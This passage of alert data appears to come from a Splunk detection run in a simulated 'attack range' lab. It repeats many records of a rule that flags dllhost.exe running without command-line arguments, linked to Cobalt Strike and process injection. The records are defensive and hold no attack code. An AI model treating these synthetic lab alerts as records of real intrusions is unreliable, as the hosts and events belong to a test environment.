\"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="21676", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="21136", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="20896", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="19620", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="18576", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17580", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1704", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="15976", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="15444", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="14940", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="1392", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="13308", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="10496", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x6a8", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5f80", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5d68", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x5a28", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x57ec", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x570", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", 